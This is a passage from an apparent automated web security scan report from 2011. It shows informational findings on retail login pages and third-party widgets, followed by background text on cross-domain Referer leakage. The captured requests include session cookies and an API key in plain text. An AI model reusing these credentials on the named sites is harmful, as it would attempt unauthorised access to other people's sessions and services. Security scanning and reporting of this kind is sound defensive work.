<script type="text/javascript" src="/N1991330425/js/navigation_flyouts_menu.js" ></script>
<script type="text/javascript" src="/N995712186/bundles/accounts.js" ></script>
<script type="text/javascript" src="/N3821919/bundles/footer.js" ></script>


<script language="javascript">
   setCurrentDomain("bluenile.com");
</script>


</head>
<body onLoad="LoadState.onLoad();" onunload="LoadState.onUnLoad();">
   <div id="bn_page_data" style="display:none"
       data-domain="bluenile.com"
       data-site="
...[SNIP]...

Request 2

GET /accounts/account-sign-in.html HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; pop=sweeps~1

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:07:19 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=29327FC5A94A61637714E1448B29219F; Path=/; Secure
Set-Cookie: bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:07:21 GMT; Path=/
Set-Cookie: SID=""; Domain=.bluenile.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 63219





<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Your Account Sign In - Blue Nile</title>

<link rel="stylesheet" type="text/css" media="screen, print" href="/N518116487/bundles/allpages.css" />
<link rel="stylesheet" type="text/css" media="screen, print" href="/N1374326862/bundles/cart.css" />
<link rel="stylesheet" type="text/css" media="print" href="/N688855944/css/cart_print.css" />
<link rel="stylesheet" type="text/css" media="screen, print" href="/984568475/css/footer.css" />

<script type="text/javascript" src="/926308692/bundles/core.js" ></script>
<script type="text/javascript" src="/N3371804/bundles/allpages.js" ></script>
<script type="text/javascript" src="/N522719515/bundles/ga.js" ></script>
<script type="text/javascript" src="/N889218490/bundles/forms.js" ></script>
<script type="text/javascript" src="/N1991330425/js/navigation_flyouts_menu.js" ></script>
<script type="text/javascript" src="/N995712186/bundles/accounts.js" ></script>
<script type="text/javascript" src="/N3821919/bundles/footer.js" ></script>


<script language="javascript">
   setCurrentDomain("bluenile.com");
</script>


</head>
<body onLoad="LoadState.onLoad();" onunload="LoadState.onUnLoad();">
   <div id="bn_page_data" style="display:none"
       data-domain="bluenile.com"
       data-site="BN"
       data-site-server-name="http://www.bluenile.com"
       data-site-secure-server-name="https://secure.bluenile.com"
       data-currencyCode=
...[SNIP]...

16.4. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget

Summary

Severity:   Information
Confidence:   Firm
Host:   http://web.aisle7.net
Path:   /api/1.0/widgets/general/newswire-widget

Request 1

GET /api/1.0/widgets/general/newswire-widget?apikey=00617ba4d64547b589e1e8b3dac082be&format=html&styles=enhanced&content_only=true&links=resource-path-encoded&request_handler_uri=http%3A%2F%2Fwww.gnc.com%2Fshop%2Findex.jsp%3FcategoryId%3D10813502%26resource%3D&clientscript=1&jsonpcallback=jsonp1305510846252 HTTP/1.1
Host: web.aisle7.net
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aisle7c6=4090937773.1.3050751040.2686703417

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Hni-Request-Id: 2256db7e-6ccb-4610-a30c-d415a86a3bc9
Content-Language: en-us
Hni-Response-Time-Ms: 16
Cache-Control: public
Last-Modified: Wed, 16 Feb 2011 18:25:59 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 3726

jsonp1305510846252("\u003clink rel=\"StyleSheet\" type=\"text/css\" href=\"http://web.aisle7.net/styles/dynamic/963/10006272/enhanced.css\" xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\u003c/link\u003e\u003cscript type=\"text/javascript\" src=\"http://web.aisle7.net/scripts/libraries/jquery/core.js\" xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\u003c/script\u003e\u003cscript type=\"text/javascript\" src=\"http://web.aisle7.net/scripts/components/widgets.js\" xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\u003c/script\u003e\u003cscript type=\"text/javascript\" src=\"http://web.aisle7.net/scripts/libraries/jquery/plugins/jquery.threedots/jquery.threedots.js\" xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\u003c/script\u003e\u003cdiv class=\"hnie_UnstructuredBody\" xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\u003cdiv class=\"hnise_Html\"\u003e\u003cdiv\u003e\u003cdiv class=\"hni_NewswireWidget\"\u003e\u003cdiv class=\"hni_NewswireLogoContainer\"\u003e\u003cimg alt=\"Newswire\" border=\"0\" src=\"http://web.aisle7.net/images/Misc/Newswire/master.k.m.us.logo.gif\"\u003e\u003c/img\u003e\u003c/div\u003e\u003cdiv class=\"hni_NewswireTargetItems\"\u003e\u003cul\u003e\u003cli class=\"hni_NewswireTargetItemFirst\"\u003e\u003ca class=\"hni_NewswireTargetItemLink\" href=\"http://www.gnc.com/shop/index.jsp?categoryId=10813502&amp;resource=%2fassets%2ffeature%2fomega-3s-for-eye-health%2f%7edefault\"\u003eOmega-3s for Eye Health\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca class=\"hni_NewswireTargetItemLink\" href=\"http://www.gnc.com/shop/index.jsp?categoryId=10813502&amp;resource=%2fassets%2ffeature%2frest-easier-with-melatonin-and-minerals%2f%7edefault\"\u003eRest Easier with Melatonin and Minerals\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca class=\"hni_NewswireTargetItemLink\" href=\"http://www.gnc.com/shop/index.jsp?categoryId=10813502&amp;resource=%2fassets%2ffeature%2ftried-and-true-prunes-help-keep-you-regular_14135_4%2f%7edefault\"\u003eTried and True: Prunes Help 
Keep You Regular\u0
...[SNIP]...

Request 2

GET /api/1.0/widgets/general/newswire-widget?apikey=00617ba4d64547b589e1e8b3dac082be&format=html&styles=enhanced&content_only=true&links=resource-path-encoded&request_handler_uri=http%3A%2F%2Fwww.gnc.com%2Fshop%2Findex.jsp%3FcategoryId%3D10813502%26resource%3D&clientscript=1&jsonpcallback=jsonp1305510846252 HTTP/1.1
Host: web.aisle7.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aisle7c6=4090937773.1.3050751040.2686703417

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Hni-Request-Id: 4c9633d6-119a-4aa1-a64e-d59f06de0728
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 168

jsonp1305510846252( { isError: true, statusCode: 403, message: "Access to resource /us/widgets/general/newswire-widget is forbidden when requested from this domain"} );

16.5. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&layout=button_count&show_faces=false&width=188&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.123.61
X-Cnection: close
Date: Mon, 16 May 2011 01:53:22 GMT
Content-Length: 6352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dd08392ab6417f56904035" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">24K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">24K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"a8ea9e85",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:378427,vip:"66.220.149.25",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"3-4D_",lhsh:"31bf7",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"J324q":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yh\/r\/HD3OAbjOVTn.css"},"V02Ya":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&layout=button_count&show_faces=false&width=188&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.199.65
X-Cnection: close
Date: Mon, 16 May 2011 01:53:33 GMT
Content-Length: 6316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dd0839d0ac033d60843924" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">24K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">24K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"f8ea197d",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:378427,vip:"66.220.149.25",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"3-4D_",lhsh:"31bf7",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"J324q":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yh\/r\/HD3OAbjOVTn.css"},"V02Ya":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php
...[SNIP]...

16.6. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Request 1

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpetco&width=185&colorscheme=light&connections=0&stream=false&header=false&height=63 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.86.49
X-Cnection: close
Date: Mon, 16 May 2011 01:59:12 GMT
Content-Length: 9048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dd084f076b987d77497592" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>PETCO</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">188,197</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_error_text">Error</a>
...[SNIP]...

Request 2

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpetco&width=185&colorscheme=light&connections=0&stream=false&header=false&height=63 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.69.27
X-Cnection: close
Date: Mon, 16 May 2011 01:59:46 GMT
Content-Length: 8964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dd085123f7899594634148" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>PETCO</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">188,198</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_error_text">Error</a>
...[SNIP]...

16.7. https://www.guitarcenter.com/MyAccount/Login.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.guitarcenter.com
Path:   /MyAccount/Login.aspx

Request 1

GET /MyAccount/Login.aspx?goto=%2fMyAccount%2fDefault.aspx HTTP/1.1
Host: www.guitarcenter.com
Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; ref=; ref_d=5/15/2011 9:40:10 PM; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; IsLoyaltyAvailable=False; NISess=1; UnicaNIODID=XnP5ihHP0wn-W9BZAUV; CjPID=2537521; CjAID=10453836; source=4ACJWXX2; UNICASOURCE=4ACJWXX2-4ACJWXX2; UNICASOURCEL=4ACJWXX2-4ACJWXX2; mbox=session#1305510019406-714170#1305512679|PC#1305510019406-714170.17#1308102819|check#true#1305510879; s_cc=true; s_sq=mfgclive%2Cmfglobal%3D%2526pid%253Dhttp%25253A//www.guitarcenter.com/%25253FCJAID%25253D10453836%252526CJPID%25253D2537521%2526oid%253Dhttp%25253A//www.guitarcenter.com/MyAccount/Default.aspx%2526ot%253DA; fcspersisthp-slider=5

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 02:11:39 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
SN: 32
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 27444


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head id="ctl00__htmHead"><script language="javascript">

var NTPT_PGEXTRA='source=&PageName=Guitar%20Center%3ASign%20In%20or%20New%20Account';

</script>
<script src="/Includes/Common/Scripts/Header.js" type="text/javascript"></script><script src="/Includes/Common/Scripts/JBSPopup.js" type="text/javascript"></script><script src="/Includes/Common/Scripts/ProductPop.js" type="text/javascript"></script><script src="/Includes/GuitarCenter/Scripts/mbox.js" type="text/javascript"></script><script src="/Includes/GuitarCenter/Scripts/header.js" type="text/javascript"></script><script src="/Includes/GuitarCenter/Scripts/ntpagetag.js" type="text/javascript"></script><title>
   GuitarCenter
</title><meta name="verify-v1" content="xm3ZwFRUWeh1YYkqPGOiWCI8zzpbBloCC+YVitoIe50=" /><meta name="y_key" content="f1dda75749288e44" /><link id="ctl00_Favicon" rel="SHORTCUT ICON" href="/includes/GuitarCenter/images/favicon.ico" /><link href="/Includes/GuitarCenter/CSS/GCFooter.css" rel="stylesheet" type="text/css" /><link type="text/css" rel="stylesheet" href="/includes/guitarcenter/GuitarCenter.css" />
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<link type="text/css" rel="stylesheet" href="/Includes/guitarcenter/css/colorbox.css" />
<script src="/includes/guitarcenter/scripts/json2.js" type="text/javascript"></script>
<script src="/includes/guitarcenter/scripts/jquery.colorbox-min.js" type="text/javascript"></script>
<!--[if lte IE 7]>
<link href="/Includes/GuitarCenter/CSS/GCIE7Footer.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 8]>
<link href="/Includes/GuitarCenter/CSS/GCIE8Footer.css" rel="stylesheet" type="text/css" />
<![endif]--
...[SNIP]...

Request 2

GET /MyAccount/Login.aspx?goto=%2fMyAccount%2fDefault.aspx HTTP/1.1
Host: www.guitarcenter.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; ref=; ref_d=5/15/2011 9:40:10 PM; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; IsLoyaltyAvailable=False; NISess=1; UnicaNIODID=XnP5ihHP0wn-W9BZAUV; CjPID=2537521; CjAID=10453836; source=4ACJWXX2; UNICASOURCE=4ACJWXX2-4ACJWXX2; UNICASOURCEL=4ACJWXX2-4ACJWXX2; mbox=session#1305510019406-714170#1305512679|PC#1305510019406-714170.17#1308102819|check#true#1305510879; s_cc=true; s_sq=mfgclive%2Cmfglobal%3D%2526pid%253Dhttp%25253A//www.guitarcenter.com/%25253FCJAID%25253D10453836%252526CJPID%25253D2537521%2526oid%253Dhttp%25253A//www.guitarcenter.com/MyAccount/Default.aspx%2526ot%253DA; fcspersisthp-slider=5

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 02:12:05 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
SN: 43
X-Powered-By: ASP.NET
Set-Cookie: UNICASOURCE=4ACJWXX2-4ACJWXX2; expires=Mon, 30-May-2011 02:12:05 GMT; path=/
Set-Cookie: UNICASOURCEL=4ACJWXX2-4ACJWXX2-4ACJWXX2; expires=Mon, 30-May-2011 02:12:05 GMT; path=/
Vary: Accept-Encoding
Content-Length: 27444


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head id="ctl00__htmHead"><script language="javascript">

var NTPT_PGEXTRA='source=&PageName=Guitar%20Center%3ASign%20In%20or%20New%20Account';

</script>
<script src="/Includes/Common/Scripts/Header.js" type="text/javascript"></script><script src="/Includes/Common/Scripts/JBSPopup.js" type="text/javascript"></script><script src="/Includes/Common/Scripts/ProductPop.js" type="text/javascript"></script><script src="/Includes/GuitarCenter/Scripts/mbox.js" type="text/javascript"></script><script src="/Includes/GuitarCenter/Scripts/header.js" type="text/javascript"></script><script src="/Includes/GuitarCenter/Scripts/ntpagetag.js" type="text/javascript"></script><title>
   GuitarCenter
</title><meta name="verify-v1" content="xm3ZwFRUWeh1YYkqPGOiWCI8zzpbBloCC+YVitoIe50=" /><meta name="y_key" content="f1dda75749288e44" /><link id="ctl00_Favicon" rel="SHORTCUT ICON" href="/includes/GuitarCenter/images/favicon.ico" /><link href="/Includes/GuitarCenter/CSS/GCFooter.css" rel="stylesheet" type="text/css" /><link type="text/css" rel="stylesheet" href="/includes/guitarcenter/GuitarCenter.css" />
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<link type="text/css" rel="stylesheet" href="/Includes/guitarcenter/css/colorbox.css" />
<script src="/includes/guitarcenter/scripts/json2.js" type="text/javascript"></script>
<script src="/includes/guitarcenter/scripts/jquery.colorbox-min.js" type="text/javascript"></script>
<!--[if lte IE 7]>
<link href="/Includes/GuitarCenter/CS
...[SNIP]...

17. Cross-domain Referer leakage
There are 60 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

